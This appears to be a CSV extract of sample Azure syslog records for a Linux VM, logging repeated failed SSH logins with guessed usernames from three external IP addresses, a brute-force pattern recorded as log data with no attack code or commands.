+10446,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:32:34,UbuntuDevEnv,2019-06-25 23:32:33,auth,UbuntuDevEnv,info,Failed password for invalid user server from 196.27.127.61 port 60620 ssh2,60203,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,server,196.27.127.6,60620,,
+10447,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:32:34,UbuntuDevEnv,2019-06-25 23:32:34,auth,UbuntuDevEnv,info,Disconnected from invalid user server 196.27.127.61 port 60620 [preauth],60203,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,server,196.27.127.6,60620,,
+10448,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:32:34,UbuntuDevEnv,2019-06-25 23:32:34,auth,UbuntuDevEnv,info,Received disconnect from 196.27.127.61 port 60620:11: Bye Bye [preauth],60203,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.27.127.6,60620,,
+10449,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:32:51,UbuntuDevEnv,2019-06-25 23:32:51,auth,UbuntuDevEnv,info,Invalid user admin2 from 203.195.235.135 port 54458,60272,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin2,203.195.235.1,54458,,
+10450,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:32:51,UbuntuDevEnv,2019-06-25 23:32:51,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=203.195.235.135,60272,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,203.195.235.1,,0,
+10451,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:32:51,UbuntuDevEnv,2019-06-25 23:32:51,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,60272,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10452,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:32:53,UbuntuDevEnv,2019-06-25 23:32:53,auth,UbuntuDevEnv,info,Failed password for invalid user admin2 from 203.195.235.135 port 54458 ssh2,60272,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin2,203.195.235.1,54458,,
+10453,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:32:53,UbuntuDevEnv,2019-06-25 23:32:53,auth,UbuntuDevEnv,info,Disconnected from invalid user admin2 203.195.235.135 port 54458 [preauth],60272,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin2,203.195.235.1,54458,,
+10454,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:32:53,UbuntuDevEnv,2019-06-25 23:32:53,auth,UbuntuDevEnv,info,Received disconnect from 203.195.235.135 port 54458:11: Bye Bye [preauth],60272,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,203.195.235.1,54458,,
+10455,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:33:50,UbuntuDevEnv,2019-06-25 23:33:50,auth,UbuntuDevEnv,info,Did not receive identification string from 203.195.235.135 port 35422,60467,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,203.195.235.1,35422,,
+10456,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:34:15,UbuntuDevEnv,2019-06-25 23:34:14,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.12.43  user=bin,60557,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bin,138.68.12.4,,0,
+10457,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:34:17,UbuntuDevEnv,2019-06-25 23:34:17,auth,UbuntuDevEnv,info,Failed password for bin from 138.68.12.43 port 36490 ssh2,60557,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,138.68.12.4,36490,,
+10458,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:34:18,UbuntuDevEnv,2019-06-25 23:34:17,auth,UbuntuDevEnv,info,Received disconnect from 138.68.12.43 port 36490:11: Bye Bye [preauth],60557,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,138.68.12.4,36490,,
+10459,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:34:18,UbuntuDevEnv,2019-06-25 23:34:17,auth,UbuntuDevEnv,info,Disconnected from authenticating user bin 138.68.12.43 port 36490 [preauth],60557,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,bin,138.68.12.4,36490,,
+10460,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:34:30,UbuntuDevEnv,2019-06-25 23:34:30,auth,UbuntuDevEnv,info,Invalid user testftp from 196.27.127.61 port 40708,60621,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,testftp,196.27.127.6,40708,,
+10461,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:34:30,UbuntuDevEnv,2019-06-25 23:34:30,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,60621,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10462,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:34:30,UbuntuDevEnv,2019-06-25 23:34:30,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.27.127.61,60621,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,196.27.127.6,,0,
+10463,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:34:32,UbuntuDevEnv,2019-06-25 23:34:32,auth,UbuntuDevEnv,info,Failed password for invalid user testftp from 196.27.127.61 port 40708 ssh2,60621,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,testftp,196.27.127.6,40708,,
+10464,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:34:32,UbuntuDevEnv,2019-06-25 23:34:32,auth,UbuntuDevEnv,info,Received disconnect from 196.27.127.61 port 40708:11: Bye Bye [preauth],60621,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.27.127.6,40708,,
+10465,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:34:32,UbuntuDevEnv,2019-06-25 23:34:32,auth,UbuntuDevEnv,info,Disconnected from invalid user testftp 196.27.127.61 port 40708 [preauth],60621,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,testftp,196.27.127.6,40708,,
+10466,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:34:42,UbuntuDevEnv,2019-06-25 23:34:41,auth,UbuntuDevEnv,info,Invalid user john from 203.195.235.135 port 44740,60663,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,john,203.195.235.1,44740,,
+10467,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:34:42,UbuntuDevEnv,2019-06-25 23:34:41,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,60663,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10468,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:34:42,UbuntuDevEnv,2019-06-25 23:34:41,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=203.195.235.135,60663,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,203.195.235.1,,0,
+10469,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:34:43,UbuntuDevEnv,2019-06-25 23:34:43,auth,UbuntuDevEnv,info,Failed password for invalid user john from 203.195.235.135 port 44740 ssh2,60663,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,john,203.195.235.1,44740,,
+10470,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:34:43,UbuntuDevEnv,2019-06-25 23:34:43,auth,UbuntuDevEnv,info,Received disconnect from 203.195.235.135 port 44740:11: Bye Bye [preauth],60663,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,203.195.235.1,44740,,
+10471,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:34:43,UbuntuDevEnv,2019-06-25 23:34:43,auth,UbuntuDevEnv,info,Disconnected from invalid user john 203.195.235.135 port 44740 [preauth],60663,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,john,203.195.235.1,44740,,
+10472,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:35:36,UbuntuDevEnv,2019-06-25 23:35:35,auth,UbuntuDevEnv,info,Invalid user telefony from 203.195.235.135 port 53944,60852,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,telefony,203.195.235.1,53944,,
+10473,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:35:36,UbuntuDevEnv,2019-06-25 23:35:36,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,60852,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10474,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:35:36,UbuntuDevEnv,2019-06-25 23:35:36,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=203.195.235.135,60852,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,203.195.235.1,,0,
+10475,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:35:38,UbuntuDevEnv,2019-06-25 23:35:38,auth,UbuntuDevEnv,info,Failed password for invalid user telefony from 203.195.235.135 port 53944 ssh2,60852,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,telefony,203.195.235.1,53944,,
+10476,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:35:38,UbuntuDevEnv,2019-06-25 23:35:38,auth,UbuntuDevEnv,info,Received disconnect from 203.195.235.135 port 53944:11: Bye Bye [preauth],60852,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,203.195.235.1,53944,,
+10477,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:35:38,UbuntuDevEnv,2019-06-25 23:35:38,auth,UbuntuDevEnv,info,Disconnected from invalid user telefony 203.195.235.135 port 53944 [preauth],60852,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,telefony,203.195.235.1,53944,,
+10478,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:36:24,UbuntuDevEnv,2019-06-25 23:36:24,auth,UbuntuDevEnv,info,Invalid user huo from 138.68.12.43 port 52690,61030,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,huo,138.68.12.4,52690,,
+10479,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:36:24,UbuntuDevEnv,2019-06-25 23:36:24,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,61030,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10480,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:36:24,UbuntuDevEnv,2019-06-25 23:36:24,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.12.43,61030,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,138.68.12.4,,0,
+10481,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:36:25,UbuntuDevEnv,2019-06-25 23:36:24,auth,UbuntuDevEnv,info,Invalid user aoyule from 196.27.127.61 port 49029,61036,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,aoyule,196.27.127.6,49029,,
+10482,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:36:25,UbuntuDevEnv,2019-06-25 23:36:24,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.27.127.61,61036,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,196.27.127.6,,0,
+10483,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:36:25,UbuntuDevEnv,2019-06-25 23:36:24,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,61036,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10484,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:36:26,UbuntuDevEnv,2019-06-25 23:36:25,auth,UbuntuDevEnv,info,Failed password for invalid user huo from 138.68.12.43 port 52690 ssh2,61030,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,huo,138.68.12.4,52690,,
+10485,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:36:26,UbuntuDevEnv,2019-06-25 23:36:26,auth,UbuntuDevEnv,info,Disconnected from invalid user huo 138.68.12.43 port 52690 [preauth],61030,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,huo,138.68.12.4,52690,,
+10486,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:36:26,UbuntuDevEnv,2019-06-25 23:36:26,auth,UbuntuDevEnv,info,Received disconnect from 138.68.12.43 port 52690:11: Bye Bye [preauth],61030,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,138.68.12.4,52690,,
+10487,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:36:27,UbuntuDevEnv,2019-06-25 23:36:26,auth,UbuntuDevEnv,info,Failed password for invalid user aoyule from 196.27.127.61 port 49029 ssh2,61036,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,aoyule,196.27.127.6,49029,,
+10488,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:36:27,UbuntuDevEnv,2019-06-25 23:36:26,auth,UbuntuDevEnv,info,Received disconnect from 196.27.127.61 port 49029:11: Bye Bye [preauth],61036,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.27.127.6,49029,,
+10489,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:36:27,UbuntuDevEnv,2019-06-25 23:36:26,auth,UbuntuDevEnv,info,Disconnected from invalid user aoyule 196.27.127.61 port 49029 [preauth],61036,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,aoyule,196.27.127.6,49029,,
+10490,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:36:32,UbuntuDevEnv,2019-06-25 23:36:31,auth,UbuntuDevEnv,info,Invalid user barnard from 203.195.235.135 port 34842,61068,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,barnard,203.195.235.1,34842,,
+10491,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:36:32,UbuntuDevEnv,2019-06-25 23:36:31,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,61068,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10492,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:36:32,UbuntuDevEnv,2019-06-25 23:36:31,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=203.195.235.135,61068,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,203.195.235.1,,0,
+10493,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:36:34,UbuntuDevEnv,2019-06-25 23:36:33,auth,UbuntuDevEnv,info,Failed password for invalid user barnard from 203.195.235.135 port 34842 ssh2,61068,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,barnard,203.195.235.1,34842,,
+10494,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:36:34,UbuntuDevEnv,2019-06-25 23:36:33,auth,UbuntuDevEnv,info,Received disconnect from 203.195.235.135 port 34842:11: Bye Bye [preauth],61068,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,203.195.235.1,34842,,
+10495,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:36:34,UbuntuDevEnv,2019-06-25 23:36:33,auth,UbuntuDevEnv,info,Disconnected from invalid user barnard 203.195.235.135 port 34842 [preauth],61068,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,barnard,203.195.235.1,34842,,
+10496,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:37:30,UbuntuDevEnv,2019-06-25 23:37:30,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=203.195.235.135  user=root,61267,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,203.195.235.1,,0,
+10497,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:37:32,UbuntuDevEnv,2019-06-25 23:37:32,auth,UbuntuDevEnv,info,Failed password for root from 203.195.235.135 port 44014 ssh2,61267,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,203.195.235.1,44014,,
+10498,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:37:32,UbuntuDevEnv,2019-06-25 23:37:32,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 203.195.235.135 port 44014 [preauth],61267,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,203.195.235.1,44014,,
+10499,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:37:32,UbuntuDevEnv,2019-06-25 23:37:32,auth,UbuntuDevEnv,info,Received disconnect from 203.195.235.135 port 44014:11: Bye Bye [preauth],61267,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,203.195.235.1,44014,,
+10500,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:38:21,UbuntuDevEnv,2019-06-25 23:38:21,auth,UbuntuDevEnv,info,Invalid user gv from 196.27.127.61 port 57350,61455,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gv,196.27.127.6,57350,,
+10501,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:38:21,UbuntuDevEnv,2019-06-25 23:38:21,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,61455,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10502,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:38:21,UbuntuDevEnv,2019-06-25 23:38:21,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.27.127.61,61455,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,196.27.127.6,,0,
+10503,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:38:23,UbuntuDevEnv,2019-06-25 23:38:23,auth,UbuntuDevEnv,info,Failed password for invalid user gv from 196.27.127.61 port 57350 ssh2,61455,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gv,196.27.127.6,57350,,
+10504,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:38:24,UbuntuDevEnv,2019-06-25 23:38:23,auth,UbuntuDevEnv,info,Disconnected from invalid user gv 196.27.127.61 port 57350 [preauth],61455,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gv,196.27.127.6,57350,,
+10505,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:38:24,UbuntuDevEnv,2019-06-25 23:38:23,auth,UbuntuDevEnv,info,Received disconnect from 196.27.127.61 port 57350:11: Bye Bye [preauth],61455,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.27.127.6,57350,,
